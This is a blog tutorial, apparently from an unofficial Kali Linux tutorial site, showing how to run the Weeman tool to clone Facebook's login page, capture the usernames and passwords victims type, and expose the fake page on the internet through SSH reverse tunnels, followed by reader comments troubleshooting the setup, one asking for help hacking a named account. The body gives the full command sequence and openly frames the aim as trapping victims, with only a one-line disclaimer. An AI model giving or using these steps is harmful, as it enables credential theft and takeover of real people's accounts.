This blog is NOT OFFICIAL website of Kali Linux. We just share Tutorials to learn Cybersecurity.

Weeman -- Phishing With http Server On Internet

Home
Weeman is a very simple http server python script. Weeman can create powerful phishing pages in localhost or same network. It work like other phishing framework, in simple words it takes username and password from users when they type username and password and the credentials grab by weeman and will show in terminal. In this tutorial we learn how to use weeman and make the phishing page working on internet on only in localhost.



Weeman is not comes with Kali Linux so, we need to clone this tool in our Kali Linux system from weeman's Github repository by using following command:

git clone https://github.com/evait-security/weeman
The screenshot of the command is following:

weeman download

Then we need to go into the directory where weeman is downloaded, To do this we use following command:

cd weeman
Now we can run this tool by applying following command:

python weeman.py
The screenshot is following :

weeman home

We can see that weeman is started successfully. Now we set the port by using the command:

set port 8080
Here we create a phishing page of facebook.com. So the command to set phishing page for facebook.com is following:

set url https://facebook.com
The screenshot is following:

setting port and url

Then we need to run the server using run command:

run
The screenshot is following:

weeman phishing

In the above screenshot we can see that we can access the phishing page by typing localhost:8080 in browser's address bar, and we see that Facebook phishing page is ready in localhost. Check the following screenshot:

Facebook phishing page

We can type our internal ip address in the place of localhost.

Done we did it but wait this is for localhost only that means this page is available for same network. Then how to forward this over internet ?

We will use SSH to forward our port that other network's devices can access our localhost. But how? Ngrok is not stable specially the free version. We use serveo.net.

Our previous tutorial is about How to forward localhost on Internet, Read that by clicking here.

Here in short (not discussing in depth) use following command in another terminal to forward our localhost :

ssh -R 80:127.0.0.1:8080 serveo.net
or

ssh -R 80:127.0.0.1:8080 localhost.run
Then we got a unique URL. Using this URL we can forward our localhost phishing page in internet. See the screenshot below:



 Now we can catch victim from anywhere not only in local network. When user tries to log in from our link he will be trapped, and he will be forwarded to real Facebook. The credential will show in weeman's terminal as following:



For detailed information about port forwarding using SSH must read this tutorial.

This this tutorial is for educational purpose only. Hacking Facebook account is crime. If anyone do any illegal activity then we are not responsible for that.


Any question or problem ? Better suggestion ? Fell free to comment in the comment section below.

Like our tutorials ? show the support by shearing our tutorials with friends or recommend them our site.
author-img
Kali Linux

Comments

31 comments
Post a Comment
  • Unknown photo
    UnknownApril 22, 2020 at 4:51 AM

    what is action-url ??

    Delete Comment
    • Kali Linux photo
      Kali LinuxApril 22, 2020 at 5:27 AM

      action_url is the URL of the webpage we want to clone and phish. If we want to make phishing page of Facebook then the action_url will be https://facebook.com

      Delete Comment
      • Unknown photo
        UnknownFebruary 24, 2021 at 3:21 PM

        Pls help it says
        "ua-ffcf28f2.localhost.run tunneled with tls termination"

        After trying to host a localhost.run

        Delete Comment
        • Kali Linux photo
          Kali LinuxFebruary 25, 2021 at 8:21 AM

          This is not an issue, you did the perfect. Your page is ready you can open the url (ua-ffcf28f2.localhost.run) on any browser to get your weeman page. Thanks.

          Delete Comment
        • Unknown photo
          UnknownJune 24, 2020 at 4:32 AM

          [23:14:16] Error: ([Errno 98] Address already in use)
          This what's its showing ooo

          Delete Comment
          • Kali Linux photo
            Kali LinuxJune 24, 2020 at 7:14 AM

            Hello, Please specify the full error. Which command is showing this error?

            Delete Comment
          • Unknown photo
            UnknownJuly 10, 2020 at 6:00 PM

            where can i download this weeman software

            Delete Comment
            • Kali Linux photo
              Kali LinuxJuly 11, 2020 at 7:41 AM

              Follow the tutorial carefully, there is a git clone command to clone weeman from it's GitHub repository. It will be downloaded by using that command.

              Delete Comment
              • Unknown photo
                UnknownJuly 11, 2020 at 10:29 AM

                when i copy paste the command "git clone https://github.com/kali-linux-tutorial/shellphish" on my commandprompt it just says " 'git' is not recognized as an internal or external command,
                operable program or batch file." how to fix that

                Delete Comment
                • Kali Linux photo
                  Kali LinuxJuly 11, 2020 at 11:26 AM

                  It seems you doesn't have git in your system. First install git by using following command:
                  sudo apt-get install git
                  then follow the tutorial.

                  Delete Comment
                • AnonymousAugust 11, 2020 at 9:53 PM

                  ssh -R 80:127.0.0.1:8080 serveo.net
                  ssh: connect to host serveo.net port 22: Connection refused

                  Is serveo working?

                  Delete Comment
                  • Kali Linux photo
                    Kali LinuxAugust 12, 2020 at 8:03 AM

                    serveo might not work always because the server goes down... You can try localhost.run in the place of of serveo.net

                    Delete Comment
                  • Guy Randalf photo
                    Guy RandalfOctober 26, 2020 at 5:29 PM

                    There is an error in this. I am using windows subsytem linux of which has worked for everything else but this.

                    My issue is when i run python weeman.py , i get a "bash: python: command not found" error. It mostly indicated that python is not found, obviously>

                    However i run it with python3 weeman.py , this shows an error i have not seen before in my life. "Error: %s" ... that is what it shows.. I need help on this please

                    Delete Comment
                    • Kali Linux photo
                      Kali LinuxOctober 26, 2020 at 5:49 PM

                      This is created in Python 2, You need to install Python version 2 on your Kali. This error means Python is either not installed or your installation damaged. You can search it on Google, or use following commands to install Python in Kali.

                      sudo apt-get update
                      sudo apt-get install python

                      Then you can try weeman.


                      Python3 will not work because this tool is not written in Python3 and not updated in last 5 years.

                      Thanks.

                      Delete Comment
                      • Unknown photo
                        UnknownDecember 5, 2020 at 11:08 PM

                        Help to hack this account please anybody
                        /Antima.nayak.79

                        Delete Comment
                      • AnooooDecember 27, 2020 at 12:16 AM

                        Aprés avoir mis "run" ça me met "Error: please set "url"

                        Delete Comment
                      • AnonymousDecember 27, 2020 at 3:33 AM

                        I am getting the link and using it for myslef to see the results, but program is only recognizing the username I type in form and not password too, had_prefilled_password => false , and first line accept consent => false . What's the problem?

                        Delete Comment
                        • Kali Linux photo
                          Kali LinuxDecember 27, 2020 at 5:13 PM

                          Yes, you are right. This tool is not working. This is not updated in last 5 years. We will write an article on similar tools in some days. Please stay tuned.

                          Delete Comment
                        • Unknown photo
                          UnknownApril 19, 2021 at 9:49 PM

                          [12:15:45] Error: please set "action_url".
                          can you set right this sir?

                          Delete Comment
                          • Kali Linux photo
                            Kali LinuxApril 21, 2021 at 10:58 AM

                            use

                            set action url https://facebook.com

                            in the place of

                            set url https://facebook.com

                            Delete Comment
                          • Adnan photo
                            AdnanNovember 13, 2021 at 12:12 AM

                            error please set 'action -url '
                            why is that appear please help me out

                            Delete Comment
                            • Kali Linux photo
                              Kali LinuxNovember 13, 2021 at 10:54 AM

                              In the place of "set url" you need to use set "action_url". It will work.

                              Delete Comment
                            • Adnan photo
                              AdnanNovember 13, 2021 at 12:13 AM

                              [13:40:51] Error: please set "action_url".

                              Delete Comment
                              • Kali Linux photo
                                Kali LinuxNovember 13, 2021 at 10:54 AM

                                In the place of "set url" you need to use set "action_url". It will work.

                                Delete Comment
                              • AnonymousMay 10, 2022 at 1:43 AM

                                error SSL.c=1946 when I run it

                                Delete Comment
                                • Kali Linux photo
                                  Kali LinuxMay 10, 2022 at 7:24 PM

                                  It means you are using wrong version of OS or Python. Please check it. Thanks.

                                  Delete Comment
                                • AnonymousMay 20, 2022 at 7:25 PM

                                  weeman do not run on python3 so how do i run it?

                                  Delete Comment
                                  • Kali Linux photo
                                    Kali LinuxMay 22, 2022 at 10:11 PM

                                    Weeman is not updated is last few years. We need to use python2 to run this. Python3 will not work. Thanks.

                                    Delete Comment
                                  • AnonymousAugust 16, 2023 at 3:18 PM

                                    After click run command in weeman I found error

                                    Delete Comment
                                    • AnonymousAugust 19, 2023 at 6:45 AM

                                      Can you please show us the error?

                                      Delete Comment
                                    google-playkhamsatmostaqltradent